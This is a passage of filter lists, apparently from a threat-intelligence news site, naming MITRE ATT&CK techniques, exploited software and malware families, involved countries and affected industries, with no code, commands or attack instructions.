Shell: T1505.003 Windows Command Shell: T1059.003 Windows Management Instrumentation: T1047
Exploited Software All @toptal/picasso-charts @toptal/picasso-forms @toptal/picasso-provider @toptal/picasso-quote @toptal/picasso-select @toptal/picasso-shared @toptal/picasso-tailwind @toptal/picasso-typograph @toptal/picasso-typography @toptal/picasso-utils @xene/core /dev/shm 5G 5G Network Access Control Systems Accounts involved in loyalty programs Accounts without MFA Active Directory Active Directory (AD) AD360 Aeroflot Information Systems AES-128 Agentic AI AI Agents AI Systems AI tools AI-generated code Airtel Zerotouch router Amazon accounts Amazon ECS Amazon Q Developer Amazon Q Developer Extension for Visual Studio Code Amazon Q Developer VS Code extension Amazon Q Developer VS Code Extension Amazon Q Developer VS Code Extension (Amazon Q) AMD Zen 2 CPUs Amp Amp Code AmpCode Android Android Applications Android System Android VPN Apps (Group A) Android VPN Apps (Group B) Android VPN Apps (Group C) Anthropic Claude Code Anthropic Filesystem MCP Server Anthropic's Filesystem MCP Server Anthropic’s MCP Inspector Anthropic's Slack MCP Server AnyDesk Apache Apache ActiveMQ Apache Tomcat Apple Advanced Protection Program Apple ID AR email accounts AresLoader AsyncRAT AT&T and Verizon Networks Auth0 AVideo AWS AWS Trusted Advisor Azure Azure Functions APIs Backup Systems BadBazaar banking/government apps bcmbipdll.dll BIG-IP Bitbucket Bitdefender Bitdefender Box V1 Bl00dy ransomware Black Basta Blacksuit Ransomware BlackSuit ransomware Bloomberg Comdb2 Boa/0.93.15 Box Broadcom BCM5820X Broadcom's implementation of the adapters required to interface with the Windows Biometric Framework (WBF) Browser Extensions Browsers (Autofill Storage) BusyBox C programming language C# Random Caesars Entertainment California State Water Board website Carmaker's Online Dealership Portal Case Management/Electronic Case Files (CM/ECF) CDK Global Change Healthcare Chaos ransomware Chase Bank ChatGPT ChatGPT Codex Chemia Chrome CI/CD Pipelines Cisco Cisco Identity Services Engine 
(ISE) Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC) Cisco IOS Cisco IOS and Cisco IOS XE Cisco IOS and Cisco IOS XE software Cisco IOS and IOS XE software (CVE-2018-0171) Cisco IOS Software Smart Install Feature Cisco ISE Cisco ISE Passive Identity Connector Cisco Networking Devices Cisco Secure Firewall Management Center (FMC) Cisco Secure Firewall Management Center Software Cisco Smart Install (SMI) Citrix NetScaler Citrix NetScaler ADC and Gateway City of Dallas servers Claude Claude Code Claude desktop CLEO MFT platforms (Harmony, VLTrader, Lexicom) ClickFix Clorox network cloud solution providers Cloud-based CRM system Cloudflare and Google DNS Cobalt Strike Colt Online Colt Technology Services (Potentially via CVE-2025-53770) Commvault Commvault Web Server Commvault's backup platform Commvault's QCommands ConnectWise Conti ControlVault Windows APIs CORNFLAKE.V3 COROS smartwatches CosMc's Promotional Membership Coupon Criteo OneTag Shared Storage API worklet (https://fledge.criteo.com/interest-group/abt/worklet) CrushFTP Cryptocurrency mining software curl.exe Cursor Cursor IDE Cylance Dahua surveillance cameras Danabot Dell ControlVault3 Dell ControlVault3 Firmware Dell ControlVault3 Plus Devices linked to global telecom providers Devin Devin AI Digital commerce platforms Digital Video Recorders Digital Video Recorders (DVRs) and WiFi routers Discord Invite System DNS DNS Management Domain Admin Accounts Domain User Accounts DoorDash Easy Anti-Cheat Eclipse ThreadX FileX Eclipse ThreadX FileX 8.5 Eclipse ThreadX FileX git commit 1b85eb2 Elastic Defend EDR Elasticsearch Electronic Voting Machines EncroChat Entra ID Envoy ERMAC Android Banking Trojan ESET eslint-config-prettier eslint-plugin-prettier ESXi hosts Exchange Server F-Secure F5 load balancers Facebook Facial Recognition Technology (FRT) systems Fickle Stealer find Firefox Flask 
web application FortiClient Endpoint Management Server Fortinet Fortinet Network Management Tool Fortinet SSL VPNs Foxit Reader Fraudulent cryptocurrency apps FreeVPN.One FreeVPN.One Chrome extension FScan Garmin Connect IQ API Gemini Gemini CLI Gemini's API Gemini's API via the llm CLI Gemini's web interface Genspark Git Repositories GitHub GitHub Copilot GitHub Copilot Agent GitHub Copilot Agent Mode GitLab GiveWP WordPress donation plugin GoodSync Google accounts Google Android (Qualcomm vulnerabilities) Google Assistant on an Android phone Google Cloud Google Forms Google Gemini CLI Google Gemini for Workspace Google Jules Google's Agent Development Kit (ADK) Google’s Jules got-fetch GPT-4o GPT-5 Great Firewall of China (GFW) Grindr Grok-4 gzip HAProxy HCL Notes HiDDeN HijackLoader Hikvision HitManPro Hotel Booking Systems HRSword HTML generated by GPT-4 HTTP/1.1 HTTP/1.1 Server Implementations Huawei equipment IAM Systems (Okta, Azure AD, Internal Authentication Services) IBM WebSphere ICS-specific malware variants iiNet order management system iiNet's order creation and tracking system Image I/O Framework ImageIO Infostealers Inotiv Systems and Data Inotiv's internal systems and data Instagram Intel CPUs Internet of Things (IoT) computers and devices internet-facing appliances, including small office/home office devices Intradev's systems iOS iOS Mobile Configuration Profiles iPadOS is Israeli Live News website j.js JAMF Java codebases Java program JavaScript Jenkins Jenkins Git Parameter Plugin Jetty Jira JuicyPotato Jules JupyterLab Kaseya Kaspersky KaWaLocker ransomware LameHug malware Lampion language server Large Language Models (LLMs) LastPass Latrodectus Ledger Nano S Plus Ledger Nano X Legacy devices in healthcare Legal Aid Agency Systems LibreWolf Linux kernel Linux Utilities (Cron jobs, systemd) LiteSpeed Web Server Llama-3-70b-instruct Local Accounts LockBit LockBit Black ransomware LockBit Windows encryptor Log4j LSQUIC Lumma Stealer LummaC2 
LummaStealer M365 Copilot macOS macOS Sequoia macOS Sonoma macOS Ventura Mailchimp Manpower's network Manus Marks & Spencer MaterialX McAfee McDonald's Feel-Good Design Hub McDonald's Global Restaurant Standards portal McDonald's online delivery app McDonald's Staff Portals MCP mcp-remote MedDream PACS Premium Mercedes-Benz (NTG6) Meta's Llama-3-8b-instruct MGM Resorts MGM World MiCollab Microsoft Microsoft Applications via Entra OAuth Microsoft Azure cloud environment Microsoft cloud solution provider Microsoft Edge Microsoft Exchange Microsoft Exchange Server Microsoft Graphics Component Microsoft Installer (MSI) Microsoft MFA Microsoft multifactor authentication Microsoft Office Equation Editor Microsoft Quick Assist Microsoft Recall Microsoft SharePoint Microsoft SharePoint Enterprise Server 2016 Microsoft SharePoint on-prem servers Microsoft SharePoint Server Microsoft SharePoint Server 2019 Microsoft SharePoint Server Subscription Edition Microsoft software Microsoft UI Automation (UIA) Microsoft Word Microsoft's cloud email service Microsoft's corporate systems Mimikatz MintsLoader Mirai Mistral's Mistral-7b-instruct-v0.2 Mobile Devices MOVEit Transfer MSDT (via Follina) mshta.exe mygoqdos.com N-able N-central NDI (Network Device Interface) Nefilim Ransomware Netflix and Paypal Netgear WGR614v9 router NetSupport Netty NetWalker ngcp-rtpengine software NGINX Node.js Nomani Trojan NVIDIA Triton Inference Server Nvidia's H20 accelerators Octopus Deploy Okta Ollama Desktop On-premise Active Directory (AD) OpenAI Operator OpenAI’s “safe URL” rendering feature OpenAI's GPT Store OpenEXR OpenHands OpenLiteSpeed OpenSSH OpenSynergy Blue SDK OptiTune Orange Belgium IT Systems Orange Group IT Systems Outdated software Paradox.ai's Olivia Chatbot PDF-XChange Editor Perplexity's AI-powered browser Comet Phoenix Cryptolocker PHP Pirated Software/Cheat Add-ons Plex Plugins Post SMTP WordPress Plugin PostgreSQL PowerSchool PowerShell prettier PTW Python web server Python's 
TarFile.extractall() and TarFile.extract() Qilin ransomware Qualcomm Adreno GPUs Quantum ransomware Quick Service Restaurant (QSR) platforms RansomHub RealBlindingEDR Recall Redis Redline/Meta Stealer Rejetto HTTP File Server (HFS) Remote Desktop Protocol Remote Desktop Protocol (RDP) Remote Monitoring and Management (RMM) Software ReVault Ring Cameras Royal ransomware Ruby Marshal Module Ruby on Rails RubyGems.org rundll32.exe Ryuk SaaS Accounts Salesforce Salesforce CRM Salesforce Data Loader SAP NetWeaver AS Java Visual Composer Scalable Vector Graphics (SVG) ScreenConnect ScriptCase SectopRAT SentinelOne SHA-1 SharePoint SharePoint (on-prem) SharePoint Server SharePoint Server 2016 SharePoint Server 2019 SharePoint Server Subscription Edition SharePoint Servers SIKE Simple Network Management Protocol (SNMP) SimpleHelp Skoda Superb (MIB3) Skuld Stealer Sliver Smartphone SMBv1 SMS payments, banking trojans and spyware Social Media Management Systems SoftEther SoftEther VPN SoftEther VPN client SoftEther VPN Client solana-pump-test solana-spl-sdk SolarWinds SonicOS SonicWall Gen 7 Firewalls Sonicwall SMA 100 Series SonicWall SMA 100 Series (SMA 210, 410, 500v) SonicWall SMA 100 Series appliances SonicWall SMA appliances SonicWall SMA Appliances SonicWall SMA100 flaw (CVE-2021-20035) SonicWall SMA100 series devices Sophos products South Korean software products South Korean Software Products Splashtop streamer Sponsorship Management System (SMS) SQLite FTS5 extension SSH sshd (OpenSSH server) SSL VPN ssp_dump_lsass Stable Signature Steam StegaStamp Symantec synckit Syncro RMM SynologyPhotos SynthID tar-fs Tata Consultancy Services (TCS) Tea App TeaOnHer Telegram Telegraph Tenda AC6 Tenda AC6 V5.0 V02.03.01.110 The Co-op thesecure.biz Third-party signed legitimate driver AToolsKrnl64.sys ThrottleStop.sys driver Thunderbird TikTok Tizen OS tj-actions/changed-files GitHub Action ToolShell Tor Browser Trend Micro Trend Micro Apex One TRW Tuya Smart Life App Twilio U.S. 
Department of Education’s G5 portal U.S. phone network U.S. telecommunications infrastructure UE (User Equipment) Unmanaged Devices Unpatched Servers Unpatched VPNs US Companies' IT Systems USB charging ports USB drive VBScript vCenter Server Appliance (VCSA) Vertex AI Studio Vertex AI with a Gemini back end Vessel Traffic Management Systems Vidar VMware VMware ESXi VMware ESXi hypervisors VMware vCenter VMware vCenter Server Appliance (vCSA) VMware vSphere VMware vSphere 7.x VMware vSphere ESXi VMware vSphere vCenter Server Voice over Internet Protocol (VoIP) providers Volkswagen ID.4 (infotainment system: MEB ICAS3) Voting machines VPN Accounts VS Code Vulnerable Software Requiring Patches Vulnerable Windows Drivers Web Applications Web shells Webroot Websites Websites (Yemen Ministry of Foreign Affairs, Yemen Ministry of Security Media and Israeli Live News) WhatsApp Wi-Fi Routers Windows Windows 10 Windows 11 Windows 2000 Windows DLL (dynamic linked library) Windows GDI+ Windows Kerberos Windows Message Queuing Windows NTLM Windows OpenSSH client Windows OS Windows Recall Windows registry keys Windows Share Windows Win32K - GRFX Windows-based workstations and servers Windsurf Windsurf Cascade WINDYTWIST.SEA WinRAR WinRingO.sys driver WordPress Workday Workday's third-party CRM platform WWBN AVideo X2anylock (aka Warlock) ransomware xcopy.exe XenoRAT XSS.is Xworm XZ-Utils Yemen Ministry of Foreign Affairs website Yemen Ministry of Security Media website YouTube Yu1 Yu2 YubiKey Zelle Zen browser ZSAService.exe ZSATrayHelper.dll ZSATrayManager.exe ZSATunnel.exe Zscaler Client Connector
Involved Countries All Africa Angola Argentina Australia Austria Azerbaijan Belarus Belgium Brazil California Canada Chile China Costa Rica Côte d’Ivoire countries Czech Republic Debian Denmark Egypt England EU Europe European Union Fedora Finland France Germany Ghana Hong Kong India Indonesia Iran Iraq Ireland Israel Italy Japan Kenya Korea Latin America Latvia Lithuania Luxembourg Malaysia Mexico Mongolia Myanmar Netherlands New Zealand Nigeria North America North Korea Norway OpenSUSE Pakistan Panama Poland Portugal Qatar quotes Red Hat Romania Russia Russian Federation Scotland Serbia Seychelles Singapore Slovakia South Korea Spain Sweden Switzerland Taiwan Thailand Turkey U.S. UAE UK Ukraine United Arab Emirates United Kingdom United States US USA Vietnam Wales Yemen Zambia
Affected Industries All Academia Adult Entertainment Advertising Advertising Technology Advertising/Marketing Aerospace Aerospace and Defense AI Airline Airlines Animation Archiving Artificial Intelligence Artificial Intelligence (AI) Audio/Video Sharing Website Hosting Audio/Video Sharing Websites Automotive Automotive Retail Aviation Backup Software Banking Biotech Business Business Associations Businesses Cloud Computing Cloud Platforms Cloud Services Cloud Storage Cloud WAF and WAF On-Prem Providers commercial facilities Communication Computing Infrastructure Construction Consulting Consumer Electronics Consumer Electronics (IoT Devices) Consumer Goods Consumer Technology Content Creation Contract Research Organization (CRO) Corporate Cybersecurity corporate network Corrections Credit Monitoring/Identity Theft Protection Credit Reporting Credit Unions Criminal Record Check Services Critical Infrastructure critical manufacturing Critical National Infrastructure (CNI) Cryptocurrency Cryptocurrency Exchanges Cyber Insurance Cyber Security Cybercrime cybersecurity Cybersecurity Data Brokerage Data Centers Data Processing Dating Defense Defense Industrial Base Defense Industrial Base (DIB) Delivery Services Digital Content Creation Digital Infrastructure Diplomatic E-bike e-commerce E-commerce Education Education/Libraries Election Infrastructure Election Technology Elections Electronics Electronics Manufacturing Embedded Systems Emergency Services Employment Energy Enterprise Networking and IT Enterprise search and security Enterprise Software Enterprises Entertainment Faith-Based Organizations Fashion Finance Financial Financial Institutions Financial Services Fitness Food & Beverage Food and Beverage Food and Drink Food Delivery Services Food Service Food Services Footwear Freelance Talent Marketplace Gambling Gaming Government Government (Federal Civilian Executive Branch) Government (Public Sector) Government (SLTT) Government agencies government facilities 
Government Services Governmental Graphic Design Hardware Providers Hardware Provision Health Care Health Insurance Health Technology healthcare Healthcare Higher Education Home Networking Home Security Homeland Security Hospitality Human Resources Information Technology Information Technology (IT) Insurance International Organizations Internet Service Providers (ISPs) IT Service Providers IT Services Jewelry Retail Journalism Law Enforcement Law Enforcement/Justice Legal Local Government Logistics Managed Service Providers (MSPs) Managed Services Providers (MSPs) Manufacturing Maritime Media Media (Television Network) Media and Broadcasting Media and Entertainment Medical Devices Military Mobile Device Manufacturing Mobile Security Museums Networking News News and Media NFT Marketplace Nuclear Nuclear Power Nuclear Weapons Oil and Gas Online Search Open-Source Software Organizations holding sponsor licenses Parks and Recreation Payment Processing Personal Information Management Pharmaceutical Pharmaceuticals Ports Postal Service Power Management Professional Services Professional, Scientific, and Technical Services Public Safety Public Sector Quick Service Restaurants (QSRs) Research Research and Education Retail Science News Security Operations Security Technology Semiconductor Semiconductor Manufacturing Semiconductors Shipping Smart Home Technology Social Media Social Networking Software Software Development Software Engineering Software Providers Software-as-a-Service (SaaS) Space Communications Sports Apparel Staffing Strategic Planning Streaming Services Surveillance Technologies Technology Technology (Silicon Valley) Technology (Storage Device Manufacturing) Telcos and Media Telecommunications Ticketing Tobacco Toy Manufacturing Trading Companies Transportation Travel Vacation Rentals Video Game Industry Video Streaming Platforms Video Surveillance Systems Visual Effects VPN Water Water Systems Wealth Management Web Application Hosting Web Hosting Web 
Infrastructure Web Security Web Services Web3 Website Hosting